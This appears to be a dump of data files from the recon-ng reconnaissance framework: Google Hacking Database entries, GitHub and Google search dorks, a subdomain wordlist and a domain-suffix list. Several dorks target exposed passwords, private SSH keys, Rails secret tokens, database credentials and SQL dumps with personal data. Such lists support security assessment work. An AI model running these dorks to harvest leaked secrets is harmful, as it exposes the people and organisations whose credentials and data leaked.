"Dork finds SQL dump files containing personal information\nBy warlock72" }, { "signatureReferenceNumber": "4310", "link": "https://www.exploit-db.com/ghdb/4310/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:DiGIR.php", "shortDescription": "inurl:DiGIR.php", "textualDescription": "# Exploit Title: (Google Dork) inurl:DiGIR.php\n# Google Dork: inurl:DiGIR.php\n# Date: 7-7-2016\n# Exploit Author: fnkym0nky\n\nDescription: Finds files that contain diagnostic issues for SQL databases,\nPHP code, among other things. Able to be used in tandem with Error Based\nSQLi, and vulnerability enumeration" }, { "signatureReferenceNumber": "4311", "link": "https://www.exploit-db.com/ghdb/4311/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=site:static.ow.ly/docs/ intext:@gmail.com | Password", "shortDescription": "site:static.ow.ly/docs/ intext:@gmail.com | Password", "textualDescription": "This dork results in documents containing passwords that are stuck in ow.ly\ncache.\nMajority are from 2016 and are still working.\n\nDiscovered by @BLM_KRS (Twitter)" }, { "signatureReferenceNumber": "4312", "link": "https://www.exploit-db.com/ghdb/4312/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:sgms/auth", "shortDescription": "inurl:sgms/auth", "textualDescription": "inurl:sgms/auth\n\nThis will allow you to find Sonicwall GMS servers.\nThis article mentions 6 vulnerabilities recently found.\n\nhttps://www.digitaldefense.com/vrt-discoveries/" }, { "signatureReferenceNumber": "4313", "link": "https://www.exploit-db.com/ghdb/4313/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=inurl:pictures intitle:index.of", "shortDescription": "inurl:pictures intitle:index.of", "textualDescription": "inurl:pictures intitle:index.of\nLoads of personal pictures and what not \n\nSent from trump tower" } ]LaNMaSteR53-recon-ng-70d967e3f530/data/gist_keywords.txt000066400000000000000000000000331312265724400225170ustar00rootroot00000000000000password Password PASSWORD LaNMaSteR53-recon-ng-70d967e3f530/data/github_dorks.txt000066400000000000000000000017041312265724400223140ustar00rootroot00000000000000# https://twitter.com/egyp7/status/628955613528109056 # rails secret token filename:secret_token.rb config language:ruby secret_token # private keys path:.ssh/id_rsa BEGIN # https://twitter.com/TekDefense/status/294556153151647744 # md5 hash of most used password 123456 e10adc3949ba59abbe56e057f20f883e # http://seclists.org/fulldisclosure/2014/Mar/343 # database passwords mysql.binero.se define("DB_PASSWORD" # http://seclists.org/fulldisclosure/2013/Jun/15 # possible SQL injection extension:php mysql_query $_GET # http://blog.conviso.com.br/2013/06/github-hacking-for-fun-and-sensitive.html # private keys extension:pem private extension:conf FTP server configuration # email addresses extension:xls mail extension:sql mysql dump # possible PHP backdoor stars:>1000 forks:>100 extension:php "eval(preg_replace(" # https://twitter.com/lanmaster53/status/629102944252772356 # Flask apps with possible SSTI vulns extension:py flask render_template_string LaNMaSteR53-recon-ng-70d967e3f530/data/google_dorks.txt000066400000000000000000000012021312265724400222770ustar00rootroot00000000000000# directory indexing intitle:index.of # config files ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini # db files ext:sql | ext:dbf | ext:mdb # logs ext:log # backups ext:bkf | ext:bkp | ext:bak | ext:old | ext:backup # sql errors intext:"sql syntax near" | intext:"syntax error has occurred" | intext:"incorrect syntax near" | intext:"unexpected end of SQL command" | intext:"Warning: mysql_connect()" | intext:"Warning: mysql_query()" | intext:"Warning: pg_connect()" # docs ext:doc | ext:docx | ext:odt | ext:pdf | ext:rtf | ext:sxw | ext:psw | ext:ppt | ext:pptx | ext:pps | ext:csv LaNMaSteR53-recon-ng-70d967e3f530/data/hostnames.txt000066400000000000000000000272651312265724400216430ustar00rootroot000000000000000 01 02 03 1 10 11 12 13 14 15 16 17 18 19 2 20 3 3com 4 5 6 7 8 9 ILMI a a.auth-ns a01 a02 a1 a2 abc about ac academico acceso access accounting accounts acid activestat ad adam adkit admin administracion administrador administrator administrators admins ads adserver adsl ae af affiliate affiliates afiliados ag agenda agent ai aix ajax ak akamai al alabama alaska albuquerque alerts alpha alterwind am amarillo americas an anaheim analyzer announce announcements antivirus ao ap apache apollo app app01 app1 apple application applications apps appserver aq ar archie arcsight argentina arizona arkansas arlington as as400 asia asterix at athena atlanta atlas att au auction austin auth auto autodiscover autorun av aw ayuda az b b.auth-ns b01 b02 b1 b2 b2b b2c ba back backend backup baker bakersfield balance balancer baltimore banking bayarea bb bbdd bbs bd bdc be bea beta bf bg bh bi billing biz biztalk bj black blackberry blog blogs blue bm bn bnc bo bob bof boise bolsa border boston boulder boy br bravo brazil britian broadcast broker bronze brown bs bsd bsd0 bsd01 bsd02 bsd1 bsd2 bt bug buggalo bugs bugzilla build bulletins burn burner buscador buy bv bw by bz c c.auth-ns ca cache cafe calendar california call calvin canada canal canon careers catalog cc cd cdburner cdn cert certificates certify certserv certsrv cf cg cgi ch channel channels charlie charlotte chat chats chatserver check checkpoint chi chicago ci cims cincinnati cisco citrix ck cl class classes classifieds classroom cleveland clicktrack client clientes clients club clubs cluster clusters cm cmail cms cn co cocoa code coldfusion colombus colorado columbus com commerce commerceserver communigate community compaq compras con concentrator conf conference conferencing confidential connect connecticut consola console consult consultant consultants consulting consumer contact content contracts core core0 core01 corp corpmail corporate correo correoweb cortafuegos counterstrike courses cr cricket crm crs cs cso css ct cu cust1 cust10 cust100 cust101 cust102 cust103 cust104 cust105 cust106 cust107 cust108 cust109 cust11 cust110 cust111 cust112 cust113 cust114 cust115 cust116 cust117 cust118 cust119 cust12 cust120 cust121 cust122 cust123 cust124 cust125 cust126 cust13 cust14 cust15 cust16 cust17 cust18 cust19 cust2 cust20 cust21 cust22 cust23 cust24 cust25 cust26 cust27 cust28 cust29 cust3 cust30 cust31 cust32 cust33 cust34 cust35 cust36 cust37 cust38 cust39 cust4 cust40 cust41 cust42 cust43 cust44 cust45 cust46 cust47 cust48 cust49 cust5 cust50 cust51 cust52 cust53 cust54 cust55 cust56 cust57 cust58 cust59 cust6 cust60 cust61 cust62 cust63 cust64 cust65 cust66 cust67 cust68 cust69 cust7 cust70 cust71 cust72 cust73 cust74 cust75 cust76 cust77 cust78 cust79 cust8 cust80 cust81 cust82 cust83 cust84 cust85 cust86 cust87 cust88 cust89 cust9 cust90 cust91 cust92 cust93 cust94 cust95 cust96 cust97 cust98 cust99 customer customers cv cvs cx cy cz d dallas data database database01 database02 database1 database2 databases datastore datos david db db0 db01 db02 db1 db2 dc de dealers dec def default defiant delaware dell delta delta1 demo demonstration demos denver depot des desarrollo descargas design designer desktop detroit dev dev0 dev01 dev1 devel develop developer developers development device devserver devsql dhcp dial dialup digital dilbert dir direct directory disc discovery discuss discussion discussions disk disney distributer distributers dj dk dm dmail dmz dnews dns dns-2 dns0 dns1 dns2 dns3 do docs documentacion documentos domain domains dominio domino dominoweb doom download downloads downtown dragon drupal dsl dyn dynamic dynip dz e e-com e-commerce e0 eagle earth east ec echo ecom ecommerce edi edu education edward ee eg eh ejemplo elpaso email employees empresa empresas en enable eng eng01 eng1 engine engineer engineering enterprise epsilon er erp es esd esm espanol estadisticas esx et eta europe events example exchange exec extern external extranet f f5 falcon farm faststats fax feedback feeds fi field file files fileserv fileserver filestore filter find finger firewall fix fixes fj fk fl flash florida flow fm fo foobar formacion foro foros fortworth forum forums foto fotos foundry fox foxtrot fr france frank fred freebsd freebsd0 freebsd01 freebsd02 freebsd1 freebsd2 freeware fresno front frontdesk fs fsp ftp ftp- ftp0 ftp2 ftpserver fw fw-1 fw1 fwsm fwsm0 fwsm01 fwsm1 g ga galeria galerias galleries gallery games gamma gandalf gate gatekeeper gateway gauss gd ge gemini general george georgia germany gf gg gh gi gl glendale gm gmail gn go gold goldmine golf gopher gp gq gr green group groups groupwise gs gsx gt gu guest gw gw1 gy h hal halflife hawaii hello help helpdesk helponline henry hermes hi hidden hk hm hn hobbes hollywood home homebase homer honeypot honolulu host host1 host3 host4 host5 hotel hotjobs houstin houston howto hp hpov hr ht http https hu hub humanresources i ia ias ibm ibmdb id ida idaho ids ie iis il illinois im images imail imap imap4 img img0 img01 img02 in inbound inc include incoming india indiana indianapolis info informix inside install int intern internal international internet intl intranet invalid investor investors io iota iowa iplanet ipmonitor ipsec ipsec-gw ipv6 ipv6.teredo iq ir irc ircd ircserver ireland iris irvine irving is isa isaserv isaserver ism israel isync it italy ix j japan java je jedi jm jo jobs john jp jrun juegos juliet juliette juniper k kansas kansascity kappa kb ke kentucky kerberos keynote kg kh ki kilo king km kn knowledgebase knoxville koe korea kp kr ks kw ky kz l la lab laboratory labs lambda lan laptop laserjet lasvegas launch lb lc ldap legal leo li lib library lima lincoln link linux linux0 linux01 linux02 linux1 linux2 lista lists listserv listserver live lk load loadbalancer local localhost log log0 log01 log02 log1 log2 logfile logfiles logger logging loghost login logs london longbeach losangeles lotus louisiana lr ls lt lu luke lv ly lyris m ma mac mac1 mac10 mac11 mac2 mac3 mac4 mac5 mach macintosh madrid mail mail2 mailer mailgate mailhost mailing maillist maillists mailroom mailserv mailsite mailsrv main maine maint mall manage management manager manufacturing map mapas maps marketing marketplace mars marvin mary maryland massachusetts master max mc mci md mdaemon me media member members memphis mercury merlin messages messenger mg mgmt mh mi miami michigan mickey midwest mike milwaukee minneapolis minnesota mirror mis mississippi missouri mk ml mm mn mngt mo mobile mobilemail mom monitor monitoring montana moon moscow movies mozart mp mp3 mpeg mpg mq mr mrtg ms ms-exchange ms-sql msexchange mssql mssql0 mssql01 mssql1 mt mta mtu mu multimedia music mv mw mx my mysql mysql0 mysql01 mysql1 mz n na name names nameserv nameserver nas nashville nat nc nd nds ne nebraska neptune net netapp netdata netgear netmeeting netscaler netscreen netstats network nevada new newhampshire newjersey newmexico neworleans news newsfeed newsfeeds newsgroups newton newyork newzealand nf ng nh ni nigeria nj nl nm nms nntp no node nokia nombres nora north northcarolina northdakota northeast northwest noticias novell november np nr ns ns- ns0 ns01 ns02 ns1 ns2 ns3 ns4 ns5 nt nt4 nt40 ntmail ntp ntserver nu null nv ny nz o oakland ocean odin office offices oh ohio ok oklahoma oklahomacity old om omaha omega omicron online ontario open openbsd openview operations ops ops0 ops01 ops02 ops1 ops2 opsware or oracle orange order orders oregon orion orlando oscar out outbound outgoing outlook outside ov owa owa01 owa02 owa1 owa2 ows oxnard p pa page pager pages paginas papa paris parners partner partners patch patches paul payroll pbx pc pc01 pc1 pc10 pc101 pc11 pc12 pc13 pc14 pc15 pc16 pc17 pc18 pc19 pc2 pc20 pc21 pc22 pc23 pc24 pc25 pc26 pc27 pc28 pc29 pc3 pc30 pc31 pc32 pc33 pc34 pc35 pc36 pc37 pc38 pc39 pc4 pc40 pc41 pc42 pc43 pc44 pc45 pc46 pc47 pc48 pc49 pc5 pc50 pc51 pc52 pc53 pc54 pc55 pc56 pc57 pc58 pc59 pc6 pc60 pc7 pc8 pc9 pcmail pda pdc pe pegasus pennsylvania peoplesoft personal pf pg pgp ph phi philadelphia phoenix phoeniz phone phones photos pi pics pictures pink pipex-gw pittsburgh pix pk pki pl plano platinum pluto pm pm1 pn po policy polls pop pop3 portal portals portfolio portland post postales postoffice ppp1 ppp10 ppp11 ppp12 ppp13 ppp14 ppp15 ppp16 ppp17 ppp18 ppp19 ppp2 ppp20 ppp21 ppp3 ppp4 ppp5 ppp6 ppp7 ppp8 ppp9 pptp pr prensa press printer printserv printserver priv privacy private problemtracker products profiles project projects promo proxy prueba pruebas ps psi pss pt pub public pubs purple pw py q qa qmail qotd quake quebec queen quotes r r01 r02 r1 r2 ra radio radius rapidsite raptor ras rc rcs rd re read realserver recruiting red redhat ref reference reg register registro registry regs relay rem remote remstats reports research reseller reserved resumenes rho rhodeisland ri ris rmi ro robert romeo root rose route router router1 rs rss rtelnet rtr rtr01 rtr1 ru rune rw rwhois s s1 s2 sa sac sacramento sadmin safe sales saltlake sam san sanantonio sandiego sanfrancisco sanjose saskatchewan saturn sb sbs sc scanner schedules scotland scotty sd se search seattle sec secret secure secured securid security sendmail seri serv serv2 server server1 servers service services servicio servidor setup sg sh shared sharepoint shareware shipping shop shoppers shopping si siebel sierra sigma signin signup silver sim sirius site sj sk skywalker sl slackware slmail sm smc sms smtp smtphost sn sniffer snmp snmpd snoopy snort so soap socal software sol solaris solutions soporte source sourcecode sourcesafe south southcarolina southdakota southeast southwest spain spam spider spiderman splunk spock spokane springfield sprint sqa sql sql0 sql01 sql1 sql7 sqlserver squid sr ss ssh ssl ssl0 ssl01 ssl1 st staff stage staging start stat static statistics stats stlouis stock storage store storefront streaming stronghold strongmail studio submit subversion sun sun0 sun01 sun02 sun1 sun2 superman supplier suppliers support sv sw sw0 sw01 sw1 sweden switch switzerland sy sybase sydney sysadmin sysback syslog syslogs system sz t tacoma taiwan talk tampa tango tau tc tcl td team tech technology techsupport telephone telephony telnet temp tennessee terminal terminalserver termserv test test2k testajax testasp testaspnet testbed testcf testing testjsp testlab testlinux testphp testserver testsite testsql testxp texas tf tftp tg th thailand theta thor tienda tiger time titan tivoli tj tk tm tn to tokyo toledo tom tool tools toplayer toronto tour tp tr tracker train training transfers trinidad trinity ts ts1 tt tucson tulsa tunnel tv tw tx tz u ua uddi ug uk um uniform union unitedkingdom unitedstates unix unixware update updates upload ups upsilon uranus urchin us usa usenet user users ut utah utilities uy uz v v6 va vader vantive vault vc ve vega vegas vend vendors venus vermont vg vi victor video videos viking violet vip virginia vista vm vmserver vmware vn vnc voice voicemail voip voyager vpn vpn0 vpn01 vpn02 vpn1 vpn2 vt vu w w1 w2 w3 wa wais wallet wam wan wap warehouse washington wc3 web webaccess webadmin webalizer webboard webcache webcam webcast webdev webdocs webfarm webhelp weblib weblogic webmail webmaster webproxy webring webs webserv webserver webservices website websites websphere websrv websrvr webstats webstore websvr webtrends welcome west westvirginia wf whiskey white whois wi wichita wiki wililiam win win01 win02 win1 win2 win2000 win2003 win2k win2k3 windows windows01 windows02 windows1 windows2 windows2000 windows2003 windowsxp wingate winnt winproxy wins winserve winxp wire wireless wisconsin wlan wordpress work world wpad write ws ws1 ws10 ws11 ws12 ws13 ws2 ws3 ws4 ws5 ws6 ws7 ws8 ws9 wusage wv ww www www- www-01 www-02 www-1 www-2 www-int www0 www01 www02 www1 www2 www3 wwwchat wwwdev wwwmail wy wyoming x x-ray xi xlogan xmail xml xp y yankee ye yellow young yt yu z z-log za zebra zera zeus zlog zm zulu zw LaNMaSteR53-recon-ng-70d967e3f530/data/suffixes.txt000066400000000000000000000303141312265724400214630ustar00rootroot00000000000000AC ACADEMY AD AE AERO AF AG AI AL AM AN AO AQ AR ARPA AS ASIA AT AU AW AX AZ BA BB BD BE BERLIN BF BG BH BI BIKE BIZ BJ BM BN BO BR BS BT BUILDERS BUZZ BV BW BY BZ CA CAB CAMERA CAMP CAREERS CAT CC CD CENTER CEO CF CG CH CI CK CL CLOTHING CM CN CO CODES COFFEE COM COMPANY COMPUTER CONSTRUCTION CONTRACTORS COOP CR CU CV CW CX CY CZ DE DIAMONDS DIRECTORY DJ DK DM DO DOMAINS DZ EC EDU EDUCATION EE EG EMAIL ENTERPRISES EQUIPMENT ER ES ESTATE ET EU FARM FI FJ FK FLORIST FM FO FR GA GALLERY GB GD GE GF GG GH GI GL GLASS GM GN GOV GP GQ GR GRAPHICS GS GT GU GURU GW GY HK HM HN HOLDINGS HOLIDAY HOUSE HR HT HU ID IE IL IM IMMOBILIEN IN INFO INSTITUTE INT INTERNATIONAL IO IQ IR IS IT JE JM JO JOBS JP KAUFEN KE KG KH KI KITCHEN KIWI KM KN KP KR KW KY KZ LA LAND LB LC LI LIGHTING LIMO LK LR LS LT LU LV LY MA MANAGEMENT MC MD ME MENU MG MH MIL MK ML MM MN MO MOBI MP MQ MR MS MT MU MUSEUM MV MW MX MY MZ NA NAME NC NE NET NF NG NI NINJA NL NO NP NR NU NZ OM ONL ORG PA PE PF PG PH PHOTOGRAPHY PHOTOS PK PL PLUMBING PM PN POST PR PRO PS PT PW PY QA RE RECIPES REPAIR RO RS RU RUHR RW SA SB SC SD SE SEXY SG SH SHOES SI SINGLES SJ SK SL SM SN SO SOLAR SOLUTIONS SR ST SU SUPPORT SV SX SY SYSTEMS SZ TATTOO TC TD TECHNOLOGY TEL TF TG TH TIPS TJ TK TL TM TN TO TODAY TP TR TRAINING TRAVEL TT TV TW TZ UA UG UK UNO US UY UZ VA VC VE VENTURES VG VI VIAJES VN VOYAGE VU WANG WF WIEN WS XN--3BST00M XN--3DS443G XN--3E0B707E XN--45BRJ9C XN--55QW42G XN--6QQ986B3XL XN--80AO21A XN--80ASEHDB XN--80ASWG XN--90A3AC XN--CLCHC0EA0B2G2A9GCD XN--FIQ228C5HS XN--FIQS8S XN--FIQZ9S XN--FPCRJ9C3D XN--FZC2C9E2C XN--GECRJ9C XN--H2BRJ9C XN--J1AMH XN--J6W193G XN--KPRW13D XN--KPRY57D XN--L1ACC XN--LGBBAT1AD8J XN--MGB9AWBF XN--MGBA3A4F16A XN--MGBAAM7A8H XN--MGBAYH7GPA XN--MGBBH1A71E XN--MGBC0A9AZCG XN--MGBERP4A5D4AR XN--MGBX4CD0AB XN--NGBC5AZD XN--O3CW4H XN--OGBPF8FL XN--P1AI XN--PGBS0DH XN--Q9JYB4C XN--S9BRJ9C XN--UNUP4Y XN--WGBH1C XN--WGBL6A XN--XKC2AL3HYE2A XN--XKC2DL3A5EE0H XN--YFRO4I67O XN--YGBI2AMMX XN--ZFR164B XXX YE YT ZA ZM ZW com.ac net.ac gov.ac org.ac mil.ac co.ae net.ae gov.ae ac.ae sch.ae org.ae mil.ae pro.ae name.ae com.af edu.af gov.af net.af org.af com.al edu.al gov.al mil.al net.al org.al ed.ao gv.ao og.ao co.ao pb.ao it.ao com.ar edu.ar gob.ar gov.ar gov.ar int.ar mil.ar net.ar org.ar tur.ar gv.at ac.at co.at or.at com.au net.au org.au edu.au gov.au csiro.au asn.au id.au org.ba net.ba edu.ba gov.ba mil.ba unsa.ba untz.ba unmo.ba unbi.ba unze.ba co.ba com.ba rs.ba co.bb com.bb net.bb org.bb gov.bb edu.bb info.bb store.bb tv.bb biz.bb com.bh info.bh cc.bh edu.bh biz.bh net.bh org.bh gov.bh com.bn edu.bn gov.bn net.bn org.bn com.bo net.bo org.bo tv.bo mil.bo int.bo gob.bo gov.bo edu.bo adm.br adv.br agr.br am.br arq.br art.br ato.br b.br bio.br blog.br bmd.br cim.br cng.br cnt.br com.br coop.br ecn.br edu.br eng.br esp.br etc.br eti.br far.br flog.br fm.br fnd.br fot.br fst.br g12.br ggf.br gov.br imb.br ind.br inf.br jor.br jus.br lel.br mat.br med.br mil.br mus.br net.br nom.br not.br ntr.br odo.br org.br ppg.br pro.br psc.br psi.br qsl.br rec.br slg.br srv.br tmp.br trd.br tur.br tv.br vet.br vlog.br wiki.br zlg.br com.bs net.bs org.bs edu.bs gov.bs com.bz edu.bz gov.bz net.bz org.bz ab.ca bc.ca mb.ca nb.ca nf.ca nl.ca ns.ca nt.ca nu.ca on.ca pe.ca qc.ca sk.ca yk.ca co.ck org.ck edu.ck gov.ck net.ck gen.ck biz.ck info.ck ac.cn com.cn edu.cn gov.cn mil.cn net.cn org.cn ah.cn bj.cn cq.cn fj.cn gd.cn gs.cn gz.cn gx.cn ha.cn hb.cn he.cn hi.cn hl.cn hn.cn jl.cn js.cn jx.cn ln.cn nm.cn nx.cn qh.cn sc.cn sd.cn sh.cn sn.cn sx.cn tj.cn tw.cn xj.cn xz.cn yn.cn zj.cn com.co org.co edu.co gov.co net.co mil.co nom.co ac.cr co.cr ed.cr fi.cr go.cr or.cr sa.cr cr ac.cy net.cy gov.cy org.cy pro.cy name.cy ekloges.cy tm.cy ltd.cy biz.cy press.cy parliament.cy com.cy edu.do gob.do gov.do com.do sld.do org.do net.do web.do mil.do art.do com.dz org.dz net.dz gov.dz edu.dz asso.dz pol.dz art.dz com.ec info.ec net.ec fin.ec med.ec pro.ec org.ec edu.ec gov.ec mil.ec com.eg edu.eg eun.eg gov.eg mil.eg name.eg net.eg org.eg sci.eg com.er edu.er gov.er mil.er net.er org.er ind.er rochest.er w.er com.es nom.es org.es gob.es edu.es com.et gov.et org.et edu.et net.et biz.et name.et info.et ac.fj biz.fj com.fj info.fj mil.fj name.fj net.fj org.fj pro.fj co.fk org.fk gov.fk ac.fk nom.fk net.fk fr tm.fr asso.fr nom.fr prd.fr presse.fr com.fr gouv.fr co.gg net.gg org.gg com.gh edu.gh gov.gh org.gh mil.gh com.gn ac.gn gov.gn org.gn net.gn com.gr edu.gr net.gr org.gr gov.gr mil.gr com.gt edu.gt net.gt gob.gt org.gt mil.gt ind.gt com.gu net.gu gov.gu org.gu edu.gu com.hk edu.hk gov.hk idv.hk net.hk org.hk ac.id co.id net.id or.id web.id sch.id mil.id go.id war.net.id ac.il co.il org.il net.il k12.il gov.il muni.il idf.il in co.in firm.in net.in org.in gen.in ind.in ac.in edu.in res.in ernet.in gov.in mil.in nic.in nic.in iq gov.iq edu.iq com.iq mil.iq org.iq net.iq ir ac.ir co.ir gov.ir id.ir net.ir org.ir sch.ir dnssec.ir gov.it edu.it co.je net.je org.je com.jo net.jo gov.jo edu.jo org.jo mil.jo name.jo sch.jo ac.jp ad.jp co.jp ed.jp go.jp gr.jp lg.jp ne.jp or.jp co.ke or.ke ne.ke go.ke ac.ke sc.ke me.ke mobi.ke info.ke per.kh com.kh edu.kh gov.kh mil.kh net.kh org.kh com.ki biz.ki de.ki net.ki info.ki org.ki gov.ki edu.ki mob.ki tel.ki km com.km coop.km asso.km nom.km presse.km tm.km medecin.km notaires.km pharmaciens.km veterinaire.km edu.km gouv.km mil.km net.kn org.kn edu.kn gov.kn kr co.kr ne.kr or.kr re.kr pe.kr go.kr mil.kr ac.kr hs.kr ms.kr es.kr sc.kr kg.kr seoul.kr busan.kr daegu.kr incheon.kr gwangju.kr daejeon.kr ulsan.kr gyeonggi.kr gangwon.kr chungbuk.kr chungnam.kr jeonbuk.kr jeonnam.kr gyeongbuk.kr gyeongnam.kr jeju.kr edu.kw com.kw net.kw org.kw gov.kw com.ky org.ky net.ky edu.ky gov.ky com.kz edu.kz gov.kz mil.kz net.kz org.kz com.lb edu.lb gov.lb net.lb org.lb gov.lk sch.lk net.lk int.lk com.lk org.lk edu.lk ngo.lk soc.lk web.lk ltd.lk assn.lk grp.lk hotel.lk com.lr edu.lr gov.lr org.lr net.lr com.lv edu.lv gov.lv org.lv mil.lv id.lv net.lv asn.lv conf.lv com.ly net.ly gov.ly plc.ly edu.ly sch.ly med.ly org.ly id.ly ma net.ma ac.ma org.ma gov.ma press.ma co.ma tm.mc asso.mc co.me net.me org.me edu.me ac.me gov.me its.me priv.me org.mg nom.mg gov.mg prd.mg tm.mg edu.mg mil.mg com.mg com.mk org.mk net.mk edu.mk gov.mk inf.mk name.mk pro.mk com.ml net.ml org.ml edu.ml gov.ml presse.ml gov.mn edu.mn org.mn com.mo edu.mo gov.mo net.mo org.mo com.mt org.mt net.mt edu.mt gov.mt aero.mv biz.mv com.mv coop.mv edu.mv gov.mv info.mv int.mv mil.mv museum.mv name.mv net.mv org.mv pro.mv ac.mw co.mw com.mw coop.mw edu.mw gov.mw int.mw museum.mw net.mw org.mw com.mx net.mx org.mx edu.mx gob.mx com.my net.my org.my gov.my edu.my sch.my mil.my name.my com.nf net.nf arts.nf store.nf web.nf firm.nf info.nf other.nf per.nf rec.nf com.ng org.ng gov.ng edu.ng net.ng sch.ng name.ng mobi.ng biz.ng mil.ng gob.ni co.ni com.ni ac.ni edu.ni org.ni nom.ni net.ni mil.ni com.np edu.np gov.np org.np mil.np net.np edu.nr gov.nr biz.nr info.nr net.nr org.nr com.nr com.om co.om edu.om ac.om sch.om gov.om net.om org.om mil.om museum.om biz.om pro.om med.om edu.pe gob.pe nom.pe mil.pe sld.pe org.pe com.pe net.pe com.ph net.ph org.ph mil.ph ngo.ph i.ph gov.ph edu.ph com.pk net.pk edu.pk org.pk fam.pk biz.pk web.pk gov.pk gob.pk gok.pk gon.pk gop.pk gos.pk pwr.pl com.pl biz.pl net.pl art.pl edu.pl org.pl ngo.pl gov.pl info.pl mil.pl waw.pl warszawa.pl wroc.pl wroclaw.pl krakow.pl katowice.pl poznan.pl lodz.pl gda.pl gdansk.pl slupsk.pl radom.pl szczecin.pl lublin.pl bialystok.pl olsztyn.pl torun.pl gorzow.pl zgora.pl biz.pr com.pr edu.pr gov.pr info.pr isla.pr name.pr net.pr org.pr pro.pr est.pr prof.pr ac.pr com.ps net.ps org.ps edu.ps gov.ps plo.ps sec.ps co.pw ne.pw or.pw ed.pw go.pw belau.pw arts.ro com.ro firm.ro info.ro nom.ro nt.ro org.ro rec.ro store.ro tm.ro www.ro co.rs org.rs edu.rs ac.rs gov.rs in.rs com.sb net.sb edu.sb org.sb gov.sb com.sc net.sc edu.sc gov.sc org.sc co.sh com.sh org.sh gov.sh edu.sh net.sh nom.sh com.sl net.sl org.sl edu.sl gov.sl gov.st saotome.st principe.st consulado.st embaixada.st org.st edu.st net.st com.st store.st mil.st co.st edu.sv gob.sv com.sv org.sv red.sv co.sz ac.sz org.sz com.tr gen.tr org.tr biz.tr info.tr av.tr dr.tr pol.tr bel.tr tsk.tr bbs.tr k12.tr edu.tr name.tr net.tr gov.tr web.tr tel.tr tv.tr co.tt com.tt org.tt net.tt biz.tt info.tt pro.tt int.tt coop.tt jobs.tt mobi.tt travel.tt museum.tt aero.tt cat.tt tel.tt name.tt mil.tt edu.tt gov.tt edu.tw gov.tw mil.tw com.tw net.tw org.tw idv.tw game.tw ebiz.tw club.tw com.mu gov.mu net.mu org.mu ac.mu co.mu or.mu ac.mz co.mz edu.mz org.mz gov.mz com.na co.na ac.nz co.nz cri.nz geek.nz gen.nz govt.nz health.nz iwi.nz maori.nz mil.nz net.nz org.nz parliament.nz school.nz abo.pa ac.pa com.pa edu.pa gob.pa ing.pa med.pa net.pa nom.pa org.pa sld.pa com.pt edu.pt gov.pt int.pt net.pt nome.pt org.pt publ.pt com.py edu.py gov.py mil.py net.py org.py com.qa edu.qa gov.qa mil.qa net.qa org.qa asso.re com.re nom.re ac.ru adygeya.ru altai.ru amur.ru arkhangelsk.ru astrakhan.ru bashkiria.ru belgorod.ru bir.ru bryansk.ru buryatia.ru cbg.ru chel.ru chelyabinsk.ru chita.ru chita.ru chukotka.ru chuvashia.ru com.ru dagestan.ru e-burg.ru edu.ru gov.ru grozny.ru int.ru irkutsk.ru ivanovo.ru izhevsk.ru jar.ru joshkar-ola.ru kalmykia.ru kaluga.ru kamchatka.ru karelia.ru kazan.ru kchr.ru kemerovo.ru khabarovsk.ru khakassia.ru khv.ru kirov.ru koenig.ru komi.ru kostroma.ru kranoyarsk.ru kuban.ru kurgan.ru kursk.ru lipetsk.ru magadan.ru mari.ru mari-el.ru marine.ru mil.ru mordovia.ru mosreg.ru msk.ru murmansk.ru nalchik.ru net.ru nnov.ru nov.ru novosibirsk.ru nsk.ru omsk.ru orenburg.ru org.ru oryol.ru penza.ru perm.ru pp.ru pskov.ru ptz.ru rnd.ru ryazan.ru sakhalin.ru samara.ru saratov.ru simbirsk.ru smolensk.ru spb.ru stavropol.ru stv.ru surgut.ru tambov.ru tatarstan.ru tom.ru tomsk.ru tsaritsyn.ru tsk.ru tula.ru tuva.ru tver.ru tyumen.ru udm.ru udmurtia.ru ulan-ude.ru vladikavkaz.ru vladimir.ru vladivostok.ru volgograd.ru vologda.ru voronezh.ru vrn.ru vyatka.ru yakutia.ru yamal.ru yekaterinburg.ru yuzhno-sakhalinsk.ru ac.rw co.rw com.rw edu.rw gouv.rw gov.rw int.rw mil.rw net.rw com.sa edu.sa gov.sa med.sa net.sa org.sa pub.sa sch.sa com.sd edu.sd gov.sd info.sd med.sd net.sd org.sd tv.sd a.se ac.se b.se bd.se c.se d.se e.se f.se g.se h.se i.se k.se l.se m.se n.se o.se org.se p.se parti.se pp.se press.se r.se s.se t.se tm.se u.se w.se x.se y.se z.se com.sg edu.sg gov.sg idn.sg net.sg org.sg per.sg art.sn com.sn edu.sn gouv.sn org.sn perso.sn univ.sn com.sy edu.sy gov.sy mil.sy net.sy news.sy org.sy ac.th co.th go.th in.th mi.th net.th or.th ac.tj biz.tj co.tj com.tj edu.tj go.tj gov.tj info.tj int.tj mil.tj name.tj net.tj nic.tj org.tj test.tj web.tj agrinet.tn com.tn defense.tn edunet.tn ens.tn fin.tn gov.tn ind.tn info.tn intl.tn mincom.tn nat.tn net.tn org.tn perso.tn rnrt.tn rns.tn rnu.tn tourism.tn ac.tz co.tz go.tz ne.tz or.tz biz.ua cherkassy.ua chernigov.ua chernovtsy.ua ck.ua cn.ua co.ua com.ua crimea.ua cv.ua dn.ua dnepropetrovsk.ua donetsk.ua dp.ua edu.ua gov.ua if.ua in.ua ivano-frankivsk.ua kh.ua kharkov.ua kherson.ua khmelnitskiy.ua kiev.ua kirovograd.ua km.ua kr.ua ks.ua kv.ua lg.ua lugansk.ua lutsk.ua lviv.ua me.ua mk.ua net.ua nikolaev.ua od.ua odessa.ua org.ua pl.ua poltava.ua pp.ua rovno.ua rv.ua sebastopol.ua sumy.ua te.ua ternopil.ua uzhgorod.ua vinnica.ua vn.ua zaporizhzhe.ua zhitomir.ua zp.ua zt.ua ac.ug co.ug go.ug ne.ug or.ug org.ug sc.ug ac.uk bl.uk british-library.uk co.uk cym.uk gov.uk govt.uk icnet.uk jet.uk lea.uk ltd.uk me.uk mil.uk mod.uk mod.uk national-library-scotland.uk nel.uk net.uk nhs.uk nhs.uk nic.uk nls.uk org.uk orgn.uk parliament.uk parliament.uk plc.uk police.uk sch.uk scot.uk soc.uk dni.us fed.us isa.us kids.us nsn.us com.uy edu.uy gub.uy mil.uy net.uy org.uy co.ve com.ve edu.ve gob.ve info.ve mil.ve net.ve 